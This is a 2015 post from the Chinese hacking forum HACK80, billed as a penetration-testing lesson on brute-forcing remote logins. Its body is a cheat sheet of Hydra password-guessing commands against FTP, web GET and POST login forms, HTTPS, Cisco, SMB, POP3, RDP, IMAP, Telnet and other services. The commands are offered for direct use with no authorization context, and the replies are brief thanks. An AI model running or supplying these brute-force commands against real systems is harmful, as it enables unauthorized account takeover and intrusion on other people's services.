HACK80 首页  立即注册  登录
现在注册
已注册用户请  登录
HACK80    视频教程

二期公开课第6节-Linux下的爆破工具+爆破指定IP远程登陆  

  •   admin ·2015-1-10 16:39:00·49559 次点击 ·阅读模式     

    马上注册,加入HACK80!与我们一起交流。

    您需要 登录 才可以下载或查看,没有帐号?立即注册

    x

    9D71BFDA-E6C4-452D-BEF2-4F4A54DC6BFA.png

    网盘下载:
    游客,如果您要查看本帖隐藏内容请回复

    文字说明:
    大家好,欢迎来到由HACK80为大家带来的 大型网站渗透测试系列视频
    ----------------------------------------------------------
    公开群(1):173304941
    公开群(2):364716461
    论坛地址:http://www.hack80.com/
    -----------------------------------------------------------


    作者:IversOn5




        破解ftp:

    # hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
    # hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

        get方式提交,破解web登录:

      # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
      # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

        post方式提交,破解web登录:

      该软件的强大之处就在于支持多种协议的破解,同样也支持对于web用户界面的登录破解,get方式提交的表单比较简单,这里通过post方式提交密码破解提供思路。
    该工具有一个不好的地方就是,如果目标网站登录时候需要验证码就无法破解了。带参数破解如下:

    <form action="index.php" method="POST">
    <input type="text" name="name" /><BR><br>
    <input type="password" name="pwd" /><br><br>
    <input type="submit" name="sub" value="提交">
    </form>

      假设有以上一个密码登录表单,我们执行命令:

    # hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”

      说明:破解的用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t 是同时线程数为1,-f 是当破解了一个密码就停止,ip 是本地,就是目标ip,http-post-form表示破解是采用http 的post 方式提交的表单密码破解。

      后面参数是网页中对应的表单字段的name 属性,后面<title>中的内容是表示错误猜解的返回信息提示,可以自定义。

        破解https:

    # hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

        破解teamspeak:

    # hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

        破解cisco:

    # hydra -P pass.txt 10.36.16.18 cisco
    # hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

        破解smb:

    # hydra -l administrator -P pass.txt 10.36.16.18 smb

        破解pop3:

    # hydra -l muts -P pass.txt my.pop3.mail pop3

        破解rdp:

    # hydra ip rdp -l administrator -P pass.txt -v

        破解http-proxy:

    # hydra -l admin -P pass.txt http-proxy://10.36.16.18

        破解imap:

    # hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
    # hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

        破解telnet

    # hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V





    -------------------------------------------------

    www.xxx.com



     1    金币 +3
    49559 次点击 · 11 人收藏  
    收藏  转播  分享
    85 回复
      Reply  
    snowolf  2015-1-10 17:01:06 
    看帖回帖是美德!{:4_111:}
      Reply  
    yangyang  2015-1-10 17:01:06 
    我是来金币的
      Reply  
    916422  2015-1-10 18:01:09 
    学习了,谢谢分享、、、
      Reply  
    Hack80论坛坛主  2015-1-10 20:03:24 
    提示: 作者被禁止或删除 内容自动屏蔽
      Reply  
    yello  2015-1-11 05:39:07 
    变化多端啊
      Reply  
    abouta  2015-1-11 10:00:28 
    看看是什么东西学习了
      Reply  
    wangjiaming  2015-1-11 10:19:53 
    怎么不一样了呢
      Reply  
    pcwind  2015-1-11 12:03:41 
    kankanbabababab
      Reply  
    路飞  2015-1-11 12:07:36 
    这个教程我只能说是灰常强大。!!!
    添加一条新回复
    您需要登录后才可以回帖 登录 | 立即注册

    本节点积分规则
    QQ
    小黑屋   ·   手机版   ·   306 人在线 最高记录 5500   ·   TOP
    我们很年轻,但我们有信念、有梦想!

      我们坚信只有今天付出了,才有机会看到明天的太阳!现在!加入我们,给你一个气氛优秀的技术圈子。  
    GMT+8, 2018-8-21 23:49, Processed in 0.054704 second(s), 28 queries .